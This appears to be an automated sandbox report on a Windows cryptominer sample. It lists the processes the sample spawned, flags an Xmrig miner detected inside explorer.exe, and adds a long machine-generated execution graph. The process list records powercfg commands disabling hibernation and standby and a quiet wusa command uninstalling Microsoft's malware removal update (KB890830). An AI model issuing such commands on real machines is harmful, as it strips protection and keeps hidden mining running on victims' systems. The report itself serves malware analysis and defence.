                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                      Imagebase:0x7ff73bd10000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:29
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:30
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                      Imagebase:0x7ff66e660000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:31
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:32
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                      Imagebase:0x7ff73bd10000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:33
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                      Imagebase:0x7ff73bd10000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:34
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:35
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:36
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:37
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:38
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:explorer.exe
                                                      Imagebase:0x7ff609140000
                                                      File size:5'141'208 bytes
                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.4573167286.000000000100C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.4573167286.0000000000F50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.4573167286.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      Has exited:false

                                                      Target ID:39
                                                      Start time:15:11:08
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\wusa.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff6e3d00000
                                                      File size:345'088 bytes
                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:44
                                                      Start time:15:11:47
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                      Imagebase:0x7ff7403e0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                        Execution Graph

                                                        Execution Coverage:3.5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:11.5%
                                                        Total number of Nodes:1623
                                                        Total number of Limit Nodes:2
3192->3193 3194 7ff6c5321394 2 API calls 3193->3194 3195 7ff6c5321530 3194->3195 3196 7ff6c532153f 3195->3196 3197 7ff6c5321394 2 API calls 3195->3197 3198 7ff6c5321394 2 API calls 3196->3198 3197->3196 3199 7ff6c532154e 3198->3199 3200 7ff6c5321394 2 API calls 3199->3200 3201 7ff6c5321558 3200->3201 3202 7ff6c532155d 3201->3202 3203 7ff6c5321394 2 API calls 3201->3203 3204 7ff6c5321394 2 API calls 3202->3204 3203->3202 3205 7ff6c5321567 3204->3205 3206 7ff6c532156c 3205->3206 3207 7ff6c5321394 2 API calls 3205->3207 3208 7ff6c5321394 2 API calls 3206->3208 3207->3206 3209 7ff6c5321576 3208->3209 3210 7ff6c532157b 3209->3210 3211 7ff6c5321394 2 API calls 3209->3211 3212 7ff6c5321394 2 API calls 3210->3212 3211->3210 3213 7ff6c5321585 3212->3213 3214 7ff6c532158a 3213->3214 3215 7ff6c5321394 2 API calls 3213->3215 3216 7ff6c5321394 2 API calls 3214->3216 3215->3214 3217 7ff6c5321599 3216->3217 3218 7ff6c5321394 2 API calls 3217->3218 3219 7ff6c53215a3 3218->3219 3220 7ff6c53215a8 3219->3220 3221 7ff6c5321394 2 API calls 3219->3221 3222 7ff6c5321394 2 API calls 3220->3222 3221->3220 3223 7ff6c53215b7 3222->3223 3224 7ff6c5321394 2 API calls 3223->3224 3225 7ff6c53215c1 3224->3225 3226 7ff6c5321394 2 API calls 3225->3226 3227 7ff6c53215c6 3226->3227 3228 7ff6c5321394 2 API calls 3227->3228 3229 7ff6c53215d5 3228->3229 3230 7ff6c5321394 2 API calls 3229->3230 3231 7ff6c53215e4 3230->3231 3232 7ff6c5321394 2 API calls 3231->3232 3233 7ff6c53215f3 3232->3233 3233->2817 3234 7ff6c5321404 3233->3234 3235 7ff6c5321394 2 API calls 3234->3235 3236 7ff6c5321413 3235->3236 3237 7ff6c5321394 2 API calls 3236->3237 3238 7ff6c5321422 3237->3238 3239 7ff6c5321394 2 API calls 3238->3239 3240 7ff6c5321431 3239->3240 3241 7ff6c5321440 3240->3241 3242 7ff6c5321394 2 API calls 3240->3242 3243 7ff6c5321394 2 API calls 3241->3243 3242->3241 3244 7ff6c532144f 3243->3244 3245 7ff6c5321394 2 API calls 3244->3245 3246 7ff6c5321459 3245->3246 3247 7ff6c532145e 3246->3247 3248 7ff6c5321394 2 
API calls 3246->3248 3249 7ff6c5321394 2 API calls 3247->3249 3248->3247 3250 7ff6c5321468 3249->3250 3251 7ff6c532146d 3250->3251 3252 7ff6c5321394 2 API calls 3250->3252 3253 7ff6c5321394 2 API calls 3251->3253 3252->3251 3254 7ff6c5321477 3253->3254 3255 7ff6c532147c 3254->3255 3256 7ff6c5321394 2 API calls 3254->3256 3257 7ff6c5321394 2 API calls 3255->3257 3256->3255 3258 7ff6c5321486 3257->3258 3259 7ff6c532148b 3258->3259 3260 7ff6c5321394 2 API calls 3258->3260 3261 7ff6c5321394 2 API calls 3259->3261 3260->3259 3262 7ff6c5321495 3261->3262 3263 7ff6c532149a 3262->3263 3264 7ff6c5321394 2 API calls 3262->3264 3265 7ff6c5321394 2 API calls 3263->3265 3264->3263 3266 7ff6c53214a4 3265->3266 3267 7ff6c53214a9 3266->3267 3268 7ff6c5321394 2 API calls 3266->3268 3269 7ff6c5321394 2 API calls 3267->3269 3268->3267 3270 7ff6c53214b3 3269->3270 3271 7ff6c5321394 2 API calls 3270->3271 3272 7ff6c53214b8 3271->3272 3273 7ff6c5321394 2 API calls 3272->3273 3274 7ff6c53214c7 3273->3274 3275 7ff6c5321394 2 API calls 3274->3275 3276 7ff6c53214d6 3275->3276 3277 7ff6c5321394 2 API calls 3276->3277 3278 7ff6c53214e5 3277->3278 3279 7ff6c5321394 2 API calls 3278->3279 3280 7ff6c53214f4 3279->3280 3281 7ff6c5321503 3280->3281 3282 7ff6c5321394 2 API calls 3280->3282 3283 7ff6c5321394 2 API calls 3281->3283 3282->3281 3284 7ff6c532150d 3283->3284 3285 7ff6c5321394 2 API calls 3284->3285 3286 7ff6c5321512 3285->3286 3287 7ff6c5321394 2 API calls 3286->3287 3288 7ff6c5321521 3287->3288 3289 7ff6c5321394 2 API calls 3288->3289 3290 7ff6c5321530 3289->3290 3291 7ff6c532153f 3290->3291 3292 7ff6c5321394 2 API calls 3290->3292 3293 7ff6c5321394 2 API calls 3291->3293 3292->3291 3294 7ff6c532154e 3293->3294 3295 7ff6c5321394 2 API calls 3294->3295 3296 7ff6c5321558 3295->3296 3297 7ff6c532155d 3296->3297 3298 7ff6c5321394 2 API calls 3296->3298 3299 7ff6c5321394 2 API calls 3297->3299 3298->3297 3300 7ff6c5321567 3299->3300 3301 7ff6c532156c 3300->3301 3302 7ff6c5321394 2 API calls 
3300->3302 3303 7ff6c5321394 2 API calls 3301->3303 3302->3301 3304 7ff6c5321576 3303->3304 3305 7ff6c532157b 3304->3305 3306 7ff6c5321394 2 API calls 3304->3306 3307 7ff6c5321394 2 API calls 3305->3307 3306->3305 3308 7ff6c5321585 3307->3308 3309 7ff6c532158a 3308->3309 3310 7ff6c5321394 2 API calls 3308->3310 3311 7ff6c5321394 2 API calls 3309->3311 3310->3309 3312 7ff6c5321599 3311->3312 3313 7ff6c5321394 2 API calls 3312->3313 3314 7ff6c53215a3 3313->3314 3315 7ff6c53215a8 3314->3315 3316 7ff6c5321394 2 API calls 3314->3316 3317 7ff6c5321394 2 API calls 3315->3317 3316->3315 3318 7ff6c53215b7 3317->3318 3319 7ff6c5321394 2 API calls 3318->3319 3320 7ff6c53215c1 3319->3320 3321 7ff6c5321394 2 API calls 3320->3321 3322 7ff6c53215c6 3321->3322 3323 7ff6c5321394 2 API calls 3322->3323 3324 7ff6c53215d5 3323->3324 3325 7ff6c5321394 2 API calls 3324->3325 3326 7ff6c53215e4 3325->3326 3327 7ff6c5321394 2 API calls 3326->3327 3328 7ff6c53215f3 3327->3328 3328->2821 3330 7ff6c5321394 2 API calls 3329->3330 3331 7ff6c5321585 3330->3331 3332 7ff6c532158a 3331->3332 3333 7ff6c5321394 2 API calls 3331->3333 3334 7ff6c5321394 2 API calls 3332->3334 3333->3332 3335 7ff6c5321599 3334->3335 3336 7ff6c5321394 2 API calls 3335->3336 3337 7ff6c53215a3 3336->3337 3338 7ff6c53215a8 3337->3338 3339 7ff6c5321394 2 API calls 3337->3339 3340 7ff6c5321394 2 API calls 3338->3340 3339->3338 3341 7ff6c53215b7 3340->3341 3342 7ff6c5321394 2 API calls 3341->3342 3343 7ff6c53215c1 3342->3343 3344 7ff6c5321394 2 API calls 3343->3344 3345 7ff6c53215c6 3344->3345 3346 7ff6c5321394 2 API calls 3345->3346 3347 7ff6c53215d5 3346->3347 3348 7ff6c5321394 2 API calls 3347->3348 3349 7ff6c53215e4 3348->3349 3350 7ff6c5321394 2 API calls 3349->3350 3351 7ff6c53215f3 3350->3351 3351->2834 3352 7ff6c532158a 3351->3352 3353 7ff6c5321394 2 API calls 3352->3353 3354 7ff6c5321599 3353->3354 3355 7ff6c5321394 2 API calls 3354->3355 3356 7ff6c53215a3 3355->3356 3357 7ff6c53215a8 3356->3357 3358 7ff6c5321394 2 
API calls 3356->3358 3359 7ff6c5321394 2 API calls 3357->3359 3358->3357 3360 7ff6c53215b7 3359->3360 3361 7ff6c5321394 2 API calls 3360->3361 3362 7ff6c53215c1 3361->3362 3363 7ff6c5321394 2 API calls 3362->3363 3364 7ff6c53215c6 3363->3364 3365 7ff6c5321394 2 API calls 3364->3365 3366 7ff6c53215d5 3365->3366 3367 7ff6c5321394 2 API calls 3366->3367 3368 7ff6c53215e4 3367->3368 3369 7ff6c5321394 2 API calls 3368->3369 3370 7ff6c53215f3 3369->3370 3370->2834 3372 7ff6c5321394 2 API calls 3371->3372 3373 7ff6c53215f3 3372->3373 3373->2832 3375 7ff6c5321394 2 API calls 3374->3375 3376 7ff6c53215b7 3375->3376 3377 7ff6c5321394 2 API calls 3376->3377 3378 7ff6c53215c1 3377->3378 3379 7ff6c5321394 2 API calls 3378->3379 3380 7ff6c53215c6 3379->3380 3381 7ff6c5321394 2 API calls 3380->3381 3382 7ff6c53215d5 3381->3382 3383 7ff6c5321394 2 API calls 3382->3383 3384 7ff6c53215e4 3383->3384 3385 7ff6c5321394 2 API calls 3384->3385 3386 7ff6c53215f3 3385->3386 3386->2852 3386->2853 3388 7ff6c532153f 3387->3388 3389 7ff6c5321394 2 API calls 3387->3389 3390 7ff6c5321394 2 API calls 3388->3390 3389->3388 3391 7ff6c532154e 3390->3391 3392 7ff6c5321394 2 API calls 3391->3392 3393 7ff6c5321558 3392->3393 3394 7ff6c532155d 3393->3394 3395 7ff6c5321394 2 API calls 3393->3395 3396 7ff6c5321394 2 API calls 3394->3396 3395->3394 3397 7ff6c5321567 3396->3397 3398 7ff6c532156c 3397->3398 3399 7ff6c5321394 2 API calls 3397->3399 3400 7ff6c5321394 2 API calls 3398->3400 3399->3398 3401 7ff6c5321576 3400->3401 3402 7ff6c532157b 3401->3402 3403 7ff6c5321394 2 API calls 3401->3403 3404 7ff6c5321394 2 API calls 3402->3404 3403->3402 3405 7ff6c5321585 3404->3405 3406 7ff6c532158a 3405->3406 3407 7ff6c5321394 2 API calls 3405->3407 3408 7ff6c5321394 2 API calls 3406->3408 3407->3406 3409 7ff6c5321599 3408->3409 3410 7ff6c5321394 2 API calls 3409->3410 3411 7ff6c53215a3 3410->3411 3412 7ff6c53215a8 3411->3412 3413 7ff6c5321394 2 API calls 3411->3413 3414 7ff6c5321394 2 API calls 3412->3414 
3413->3412 3415 7ff6c53215b7 3414->3415 3416 7ff6c5321394 2 API calls 3415->3416 3417 7ff6c53215c1 3416->3417 3418 7ff6c5321394 2 API calls 3417->3418 3419 7ff6c53215c6 3418->3419 3420 7ff6c5321394 2 API calls 3419->3420 3421 7ff6c53215d5 3420->3421 3422 7ff6c5321394 2 API calls 3421->3422 3423 7ff6c53215e4 3422->3423 3424 7ff6c5321394 2 API calls 3423->3424 3425 7ff6c53215f3 3424->3425 3425->2876 3425->2877 3427 7ff6c5321394 2 API calls 3426->3427 3428 7ff6c53214b3 3427->3428 3429 7ff6c5321394 2 API calls 3428->3429 3430 7ff6c53214b8 3429->3430 3431 7ff6c5321394 2 API calls 3430->3431 3432 7ff6c53214c7 3431->3432 3433 7ff6c5321394 2 API calls 3432->3433 3434 7ff6c53214d6 3433->3434 3435 7ff6c5321394 2 API calls 3434->3435 3436 7ff6c53214e5 3435->3436 3437 7ff6c5321394 2 API calls 3436->3437 3438 7ff6c53214f4 3437->3438 3439 7ff6c5321503 3438->3439 3440 7ff6c5321394 2 API calls 3438->3440 3441 7ff6c5321394 2 API calls 3439->3441 3440->3439 3442 7ff6c532150d 3441->3442 3443 7ff6c5321394 2 API calls 3442->3443 3444 7ff6c5321512 3443->3444 3445 7ff6c5321394 2 API calls 3444->3445 3446 7ff6c5321521 3445->3446 3447 7ff6c5321394 2 API calls 3446->3447 3448 7ff6c5321530 3447->3448 3449 7ff6c532153f 3448->3449 3450 7ff6c5321394 2 API calls 3448->3450 3451 7ff6c5321394 2 API calls 3449->3451 3450->3449 3452 7ff6c532154e 3451->3452 3453 7ff6c5321394 2 API calls 3452->3453 3454 7ff6c5321558 3453->3454 3455 7ff6c532155d 3454->3455 3456 7ff6c5321394 2 API calls 3454->3456 3457 7ff6c5321394 2 API calls 3455->3457 3456->3455 3458 7ff6c5321567 3457->3458 3459 7ff6c532156c 3458->3459 3460 7ff6c5321394 2 API calls 3458->3460 3461 7ff6c5321394 2 API calls 3459->3461 3460->3459 3462 7ff6c5321576 3461->3462 3463 7ff6c532157b 3462->3463 3464 7ff6c5321394 2 API calls 3462->3464 3465 7ff6c5321394 2 API calls 3463->3465 3464->3463 3466 7ff6c5321585 3465->3466 3467 7ff6c532158a 3466->3467 3468 7ff6c5321394 2 API calls 3466->3468 3469 7ff6c5321394 2 API calls 3467->3469 3468->3467 3470 
7ff6c5321599 3469->3470 3471 7ff6c5321394 2 API calls 3470->3471 3472 7ff6c53215a3 3471->3472 3473 7ff6c53215a8 3472->3473 3474 7ff6c5321394 2 API calls 3472->3474 3475 7ff6c5321394 2 API calls 3473->3475 3474->3473 3476 7ff6c53215b7 3475->3476 3477 7ff6c5321394 2 API calls 3476->3477 3478 7ff6c53215c1 3477->3478 3479 7ff6c5321394 2 API calls 3478->3479 3480 7ff6c53215c6 3479->3480 3481 7ff6c5321394 2 API calls 3480->3481 3482 7ff6c53215d5 3481->3482 3483 7ff6c5321394 2 API calls 3482->3483 3484 7ff6c53215e4 3483->3484 3485 7ff6c5321394 2 API calls 3484->3485 3486 7ff6c53215f3 3485->3486 3486->2884 3487 7ff6c5321440 3486->3487 3488 7ff6c5321394 2 API calls 3487->3488 3489 7ff6c532144f 3488->3489 3490 7ff6c5321394 2 API calls 3489->3490 3491 7ff6c5321459 3490->3491 3492 7ff6c532145e 3491->3492 3493 7ff6c5321394 2 API calls 3491->3493 3494 7ff6c5321394 2 API calls 3492->3494 3493->3492 3495 7ff6c5321468 3494->3495 3496 7ff6c532146d 3495->3496 3497 7ff6c5321394 2 API calls 3495->3497 3498 7ff6c5321394 2 API calls 3496->3498 3497->3496 3499 7ff6c5321477 3498->3499 3500 7ff6c532147c 3499->3500 3501 7ff6c5321394 2 API calls 3499->3501 3502 7ff6c5321394 2 API calls 3500->3502 3501->3500 3503 7ff6c5321486 3502->3503 3504 7ff6c532148b 3503->3504 3505 7ff6c5321394 2 API calls 3503->3505 3506 7ff6c5321394 2 API calls 3504->3506 3505->3504 3507 7ff6c5321495 3506->3507 3508 7ff6c532149a 3507->3508 3509 7ff6c5321394 2 API calls 3507->3509 3510 7ff6c5321394 2 API calls 3508->3510 3509->3508 3511 7ff6c53214a4 3510->3511 3512 7ff6c53214a9 3511->3512 3513 7ff6c5321394 2 API calls 3511->3513 3514 7ff6c5321394 2 API calls 3512->3514 3513->3512 3515 7ff6c53214b3 3514->3515 3516 7ff6c5321394 2 API calls 3515->3516 3517 7ff6c53214b8 3516->3517 3518 7ff6c5321394 2 API calls 3517->3518 3519 7ff6c53214c7 3518->3519 3520 7ff6c5321394 2 API calls 3519->3520 3521 7ff6c53214d6 3520->3521 3522 7ff6c5321394 2 API calls 3521->3522 3523 7ff6c53214e5 3522->3523 3524 7ff6c5321394 2 API calls 
3523->3524 3525 7ff6c53214f4 3524->3525 3526 7ff6c5321503 3525->3526 3527 7ff6c5321394 2 API calls 3525->3527 3528 7ff6c5321394 2 API calls 3526->3528 3527->3526 3529 7ff6c532150d 3528->3529 3530 7ff6c5321394 2 API calls 3529->3530 3531 7ff6c5321512 3530->3531 3532 7ff6c5321394 2 API calls 3531->3532 3533 7ff6c5321521 3532->3533 3534 7ff6c5321394 2 API calls 3533->3534 3535 7ff6c5321530 3534->3535 3536 7ff6c532153f 3535->3536 3537 7ff6c5321394 2 API calls 3535->3537 3538 7ff6c5321394 2 API calls 3536->3538 3537->3536 3539 7ff6c532154e 3538->3539 3540 7ff6c5321394 2 API calls 3539->3540 3541 7ff6c5321558 3540->3541 3542 7ff6c532155d 3541->3542 3543 7ff6c5321394 2 API calls 3541->3543 3544 7ff6c5321394 2 API calls 3542->3544 3543->3542 3545 7ff6c5321567 3544->3545 3546 7ff6c532156c 3545->3546 3547 7ff6c5321394 2 API calls 3545->3547 3548 7ff6c5321394 2 API calls 3546->3548 3547->3546 3549 7ff6c5321576 3548->3549 3550 7ff6c532157b 3549->3550 3551 7ff6c5321394 2 API calls 3549->3551 3552 7ff6c5321394 2 API calls 3550->3552 3551->3550 3553 7ff6c5321585 3552->3553 3554 7ff6c532158a 3553->3554 3555 7ff6c5321394 2 API calls 3553->3555 3556 7ff6c5321394 2 API calls 3554->3556 3555->3554 3557 7ff6c5321599 3556->3557 3558 7ff6c5321394 2 API calls 3557->3558 3559 7ff6c53215a3 3558->3559 3560 7ff6c53215a8 3559->3560 3561 7ff6c5321394 2 API calls 3559->3561 3562 7ff6c5321394 2 API calls 3560->3562 3561->3560 3563 7ff6c53215b7 3562->3563 3564 7ff6c5321394 2 API calls 3563->3564 3565 7ff6c53215c1 3564->3565 3566 7ff6c5321394 2 API calls 3565->3566 3567 7ff6c53215c6 3566->3567 3568 7ff6c5321394 2 API calls 3567->3568 3569 7ff6c53215d5 3568->3569 3570 7ff6c5321394 2 API calls 3569->3570 3571 7ff6c53215e4 3570->3571 3572 7ff6c5321394 2 API calls 3571->3572 3573 7ff6c53215f3 3572->3573 3573->2884 3573->2897 3575 7ff6c53235c1 memset 3574->3575 3585 7ff6c53233c3 3574->3585 3576 7ff6c53235e6 3575->3576 3578 7ff6c532362b wcscpy wcscat wcslen 3576->3578 3577 7ff6c532343a memset 3577->3585 
3579 7ff6c5321422 2 API calls 3578->3579 3581 7ff6c5323728 3579->3581 3580 7ff6c5323493 wcscpy wcscat wcslen 3891 7ff6c5321422 3580->3891 3583 7ff6c5323767 3581->3583 3982 7ff6c5321431 3581->3982 3590 7ff6c53214c7 3583->3590 3585->3575 3585->3577 3585->3580 3587 7ff6c532145e 2 API calls 3585->3587 3589 7ff6c5323579 3585->3589 3587->3585 3588 7ff6c532145e 2 API calls 3588->3583 3589->3575 3591 7ff6c5321394 2 API calls 3590->3591 3592 7ff6c53214d6 3591->3592 3593 7ff6c5321394 2 API calls 3592->3593 3594 7ff6c53214e5 3593->3594 3595 7ff6c5321394 2 API calls 3594->3595 3596 7ff6c53214f4 3595->3596 3597 7ff6c5321503 3596->3597 3598 7ff6c5321394 2 API calls 3596->3598 3599 7ff6c5321394 2 API calls 3597->3599 3598->3597 3600 7ff6c532150d 3599->3600 3601 7ff6c5321394 2 API calls 3600->3601 3602 7ff6c5321512 3601->3602 3603 7ff6c5321394 2 API calls 3602->3603 3604 7ff6c5321521 3603->3604 3605 7ff6c5321394 2 API calls 3604->3605 3606 7ff6c5321530 3605->3606 3607 7ff6c532153f 3606->3607 3608 7ff6c5321394 2 API calls 3606->3608 3609 7ff6c5321394 2 API calls 3607->3609 3608->3607 3610 7ff6c532154e 3609->3610 3611 7ff6c5321394 2 API calls 3610->3611 3612 7ff6c5321558 3611->3612 3613 7ff6c532155d 3612->3613 3614 7ff6c5321394 2 API calls 3612->3614 3615 7ff6c5321394 2 API calls 3613->3615 3614->3613 3616 7ff6c5321567 3615->3616 3617 7ff6c532156c 3616->3617 3618 7ff6c5321394 2 API calls 3616->3618 3619 7ff6c5321394 2 API calls 3617->3619 3618->3617 3620 7ff6c5321576 3619->3620 3621 7ff6c532157b 3620->3621 3622 7ff6c5321394 2 API calls 3620->3622 3623 7ff6c5321394 2 API calls 3621->3623 3622->3621 3624 7ff6c5321585 3623->3624 3625 7ff6c532158a 3624->3625 3626 7ff6c5321394 2 API calls 3624->3626 3627 7ff6c5321394 2 API calls 3625->3627 3626->3625 3628 7ff6c5321599 3627->3628 3629 7ff6c5321394 2 API calls 3628->3629 3630 7ff6c53215a3 3629->3630 3631 7ff6c53215a8 3630->3631 3632 7ff6c5321394 2 API calls 3630->3632 3633 7ff6c5321394 2 API calls 3631->3633 3632->3631 3634 7ff6c53215b7 
3633->3634 3635 7ff6c5321394 2 API calls 3634->3635 3636 7ff6c53215c1 3635->3636 3637 7ff6c5321394 2 API calls 3636->3637 3638 7ff6c53215c6 3637->3638 3639 7ff6c5321394 2 API calls 3638->3639 3640 7ff6c53215d5 3639->3640 3641 7ff6c5321394 2 API calls 3640->3641 3642 7ff6c53215e4 3641->3642 3643 7ff6c5321394 2 API calls 3642->3643 3644 7ff6c53215f3 3643->3644 3644->2913 3646 7ff6c5322f88 3645->3646 3647 7ff6c53214a9 2 API calls 3646->3647 3648 7ff6c5322fd0 3647->3648 3648->2885 3650 7ff6c5322690 10 API calls 3649->3650 3651 7ff6c532391e 3650->3651 3652 7ff6c53214a9 2 API calls 3651->3652 3671 7ff6c5323b21 3651->3671 3653 7ff6c5323967 3652->3653 3654 7ff6c5323b28 3653->3654 4071 7ff6c53214b8 3653->4071 4340 7ff6c53215c6 3654->4340 3657 7ff6c5323a87 memset 4133 7ff6c532148b 3657->4133 3659 7ff6c53214b8 2 API calls 3661 7ff6c532398f 3659->3661 3661->3657 3661->3659 4128 7ff6c53215d5 3661->4128 3665 7ff6c53214b8 2 API calls 3666 7ff6c5323b07 3665->3666 3666->3654 3667 7ff6c5323b0b 3666->3667 4267 7ff6c532147c 3667->4267 3670 7ff6c532145e 2 API calls 3670->3671 3671->2898 3676 7ff6c53283f0 3672->3676 3674 7ff6c53213b8 3675 7ff6c53213c6 NtAddBootEntry 3674->3675 3675->2955 3677 7ff6c532840e 3676->3677 3680 7ff6c532843b 3676->3680 3677->3674 3678 7ff6c53284e3 3679 7ff6c53284ff malloc 3678->3679 3681 7ff6c5328520 3679->3681 3680->3677 3680->3678 3681->3677 3683 7ff6c532266f memset 3682->3683 3683->3153 3760 7ff6c532155d 3684->3760 3686 7ff6c53227f4 3687 7ff6c53214c7 2 API calls 3686->3687 3688 7ff6c5322816 3687->3688 3692 7ff6c5321503 2 API calls 3688->3692 3690 7ff6c5322785 wcsncmp 3791 7ff6c53214e5 3690->3791 3693 7ff6c532283d 3692->3693 3695 7ff6c5322847 memset 3693->3695 3694 7ff6c5322d27 3696 7ff6c5322877 3695->3696 3697 7ff6c53228bc wcscpy wcscat wcslen 3696->3697 3698 7ff6c532291a 3697->3698 3699 7ff6c53228ee wcslen 3697->3699 3700 7ff6c5322967 wcslen 3698->3700 3702 7ff6c5322985 3698->3702 3699->3698 3700->3702 3701 7ff6c53229d9 wcslen 3703 7ff6c53214a9 2 API calls 
